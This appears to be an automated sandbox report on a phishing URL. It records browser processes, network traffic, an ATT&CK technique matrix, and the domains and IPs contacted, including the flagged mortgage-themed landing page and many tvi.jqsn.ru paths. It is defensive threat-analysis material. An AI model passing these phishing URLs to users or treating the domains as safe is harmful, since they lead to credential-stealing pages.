      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 00:34:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d0ZoHqpsd4bxtHi4oh6izArmsT9XPI2GBg5R2qx7sz1zL3mMIgQWfRvzQWtIw8pJrAJcWhXhssIClmQe5Dcofmm5mQC601%2Beu1G2AnS0tRNuOzr4rDZW4iXa5CN3dQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 875854c1d8ed4578-ATL
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 00:34:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccess-Control-Allow-Origin: *X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gIztJXq0cARyQS1sW0d5JYKq6X15PV8iOJE9%2B5H8YVvItQpxPj4725cHGllSzE5bMaGVDQ5DvVVGTg%2F%2BColUrIV9g2WPf4pgt2I6kzMKurMI%2BgkIzKImh9TNCAgqPQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}alt-svc: h3=":443"; ma=86400Server: cloudflareCF-RAY: 875854f5cc0a457e-ATL
      Source: chromecache_65.2.drString found in binary or memory: https://cloud.google.com/contact
      Source: chromecache_65.2.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
      Source: chromecache_65.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
      Source: chromecache_65.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
      Source: chromecache_65.2.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
      Source: chromecache_65.2.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
      Source: chromecache_65.2.drString found in binary or memory: https://recaptcha.net
      Source: chromecache_65.2.drString found in binary or memory: https://support.google.com/recaptcha
      Source: chromecache_65.2.drString found in binary or memory: https://support.google.com/recaptcha#6262736
      Source: chromecache_65.2.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
      Source: chromecache_65.2.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
      Source: chromecache_80.2.dr, chromecache_65.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/
      Source: chromecache_65.2.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__.
      Source: chromecache_80.2.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__en.js
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.63.206.91:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: classification engineClassification label: mal72.phis.win@19/75@24/12
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1996,i,13394074848288061541,3932029769900024955,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1996,i,13394074848288061541,3932029769900024955,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Process Injection
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org100%SlashNextCredential Stealing type: Phishing & Social Engineering
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://www.gstatic.c..?/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__.0%URL Reputationsafe
      https://recaptcha.net0%URL Reputationsafe
      https://tvi.jqsn.ru/i8jbs1sy/8%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        bestohiomortgagerate.com
        69.49.228.234
        truefalse
          unknown
          code.jquery.com
          151.101.66.137
          truefalse
            high
            d2vgu95hoyrpkh.cloudfront.net
            108.156.152.4
            truefalse
              high
              challenges.cloudflare.com
              104.17.2.184
              truefalse
                high
                www.google.com
                172.217.215.147
                truefalse
                  high
                  tvi.jqsn.ru
                  104.21.3.147
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.211.108
                    truefalse
                      unknown
                      cdn.socket.io
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://tvi.jqsn.ru/st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252false
                          unknown
                          https://tvi.jqsn.ru/34s6xy28ZSROS4cpdHadCJue12ijCcyRgKMuW0KrD89102false
                            unknown
                            https://bestohiomortgagerate.com/favicon.icofalse
                              unknown
                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bcfalse
                                  high
                                  https://tvi.jqsn.ru/web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocketfalse
                                    unknown
                                    https://tvi.jqsn.ru/qrroFnG3M60J3FhNqOM0FGt8JF3y5912lJkLOor1EsoLL8YoDCMTx8tUgChmhe8gngUwuef236false
                                      unknown
                                      https://tvi.jqsn.ru/mnVEZMoPpz26As0HD4QkJNjKc65AwrKklFl1gYZXk0KqRGGuqdpbpq90150false
                                        unknown
                                        https://tvi.jqsn.ru/gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210false
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/875854595e7f53f2/1713314068893/8waoYsE4nxAn5eofalse
                                            high
                                            https://tvi.jqsn.ru/89T0AFtET47Mtjcd1jdhpDg4Knmkab73false
                                              unknown
                                              https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.orgtrue
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normalfalse
                                                  high
                                                  https://a.nel.cloudflare.com/report/v4?s=VfSW17u%2FJbQlKjlAX2MhIaaou%2BtMjSJ3U9fUs5Etgj9wpW8I2O%2FIRVyd04sSLcCbkJxI1Fyj0MMvC%2FfkYgTvcKulJKA1mKLQGfJuveHgtVc6QBobl29vkg3q9YY7aA%3D%3Dfalse
                                                    high
                                                    https://www.google.com/recaptcha/api.jsfalse
                                                      high
                                                      https://tvi.jqsn.ru/klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228false
                                                        unknown
                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                          high
                                                          https://tvi.jqsn.ru/i8jbs1sy/falseunknown
                                                          https://tvi.jqsn.ru/mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212false
                                                            unknown
                                                            https://tvi.jqsn.ru/i8jbs1sy/#Xnobody@nobody.orgfalse
                                                              unknown
                                                              https://tvi.jqsn.ru/yz4ne6w1ln1Sx0R456oW1wuxFqr49false
                                                                unknown
                                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/875854595e7f53f2/1713314068896/edde83305c606ea0c20efed6626591eb5ff70ccaffa9f8dd87ba107fdd444183/stHfhAVhA9tPb5nfalse
                                                                  high
                                                                  https://tvi.jqsn.ru/wxTR9F6RIuCf7a1umjv4VkTqrH2FLbbvnrKL12130false
                                                                    unknown
                                                                    https://tvi.jqsn.ru/glVuTopMUrrdyu89qRN0N14qAuhvIhKVz2false
                                                                      unknown
                                                                      https://tvi.jqsn.ru/favicon.icofalse
                                                                        unknown
                                                                        https://tvi.jqsn.ru/56VQuccXKefp045CypTXYc2st60false
                                                                          unknown
                                                                          https://tvi.jqsn.ru/wx3DGb43mykL3VQGKZs4rsXyO8wG7fTCt1TRnhO0Dn3uab176false
                                                                            unknown
                                                                            https://tvi.jqsn.ru/pqVb1I3EaC9yzhgYJIUPwx31false
                                                                              unknown
                                                                              https://tvi.jqsn.ru/qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135false
                                                                                unknown
                                                                                https://tvi.jqsn.ru/23IwflouldIy5KfULABLPv90jLWsGG8fJ1vw67false
                                                                                  unknown
                                                                                  https://a.nel.cloudflare.com/report/v4?s=H%2Fdah5A1d7hlg7hb04ppSsBJKMsf%2Bt6RPJ9%2BUEYcjiaSTzWY3T1dulP4JjnTYNxn6TpaCo4FHB58wFDZjPCXCP00rT3ecBmbaeYu3IKZ7NwB5HG89WpUPCGX%2BbcISQ%3D%3Dfalse
                                                                                    high
                                                                                    https://tvi.jqsn.ru/i8jbs1sy/?GXnobody@nobody.orgfalse
                                                                                      unknown
                                                                                      https://tvi.jqsn.ru/cdMVTgR3ifU0J478w5vPGB5lhjWmn93false
                                                                                        unknown
                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=875854595e7f53f2false
                                                                                          high
                                                                                          https://tvi.jqsn.ru/xygiTdFpqHPcd30false
                                                                                            unknown
                                                                                            https://tvi.jqsn.ru/op9nJ96mWPUqO6569NQJB0Igha1bclYFfgOjFPonTi9mJHOHcd200false
                                                                                              unknown
                                                                                              https://tvi.jqsn.ru/ijsDamms1S0iGERMnflyzrJHXLzG9i2LUxCn8wGgzh2Sw78163false
                                                                                                unknown
                                                                                                https://cdn.socket.io/4.6.0/socket.io.min.jsfalse
                                                                                                  high
                                                                                                  https://tvi.jqsn.ru/sqpKuPasEkRjZVcYlD9tzoTs6U9MaxM01XQQUbYMcX05n1wfalse
                                                                                                    unknown
                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                    https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_65.2.drfalse
                                                                                                      high
                                                                                                      https://support.google.com/recaptcha#6262736chromecache_65.2.drfalse
                                                                                                        high
                                                                                                        https://www.gstatic.c..?/recaptcha/releases/rz4DvU-cY2JYCwHSTck0_qm-/recaptcha__.chromecache_65.2.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        low
                                                                                                        https://support.google.com/recaptcha/?hl=en#6223828chromecache_65.2.drfalse
                                                                                                          high
                                                                                                          https://cloud.google.com/contactchromecache_65.2.drfalse
                                                                                                            high
                                                                                                            https://support.google.com/recaptcha/#6175971chromecache_65.2.drfalse
                                                                                                              high
                                                                                                              https://www.google.com/recaptcha/api2/chromecache_80.2.dr, chromecache_65.2.drfalse
                                                                                                                high
                                                                                                                https://support.google.com/recaptchachromecache_65.2.drfalse
                                                                                                                  high
                                                                                                                  https://cloud.google.com/recaptcha-enterprise/billing-informationchromecache_65.2.drfalse
                                                                                                                    high
                                                                                                                    https://recaptcha.netchromecache_65.2.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_65.2.drfalse
                                                                                                                      high
                                                                                                                      https://play.google.com/log?format=json&hasfast=truechromecache_65.2.drfalse
                                                                                                                        high
                                                                                                                        https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-recachromecache_65.2.drfalse
                                                                                                                          high
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          69.49.228.234
                                                                                                                          bestohiomortgagerate.comUnited States
                                                                                                                          46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                          172.217.215.104
                                                                                                                          unknownUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          172.217.215.147
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          104.21.3.147
                                                                                                                          tvi.jqsn.ruUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          108.156.152.4
                                                                                                                          d2vgu95hoyrpkh.cloudfront.netUnited States
                                                                                                                          16509AMAZON-02USfalse
                                                                                                                          104.17.3.184
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          239.255.255.250
                                                                                                                          unknownReserved
                                                                                                                          unknownunknownfalse
                                                                                                                          172.67.130.212
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          151.101.66.137
                                                                                                                          code.jquery.comUnited States
                                                                                                                          54113FASTLYUSfalse
                                                                                                                          35.190.80.1
                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          104.17.2.184
                                                                                                                          challenges.cloudflare.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          IP
                                                                                                                          192.168.2.4
                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                          Analysis ID:1427118
                                                                                                                          Start date and time:2024-04-17 02:33:30 +02:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 3m 29s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                          Sample URL:https://bestohiomortgagerate.com/dream/mer/7/nobody@nobody.org
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal72.phis.win@19/75@24/12
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
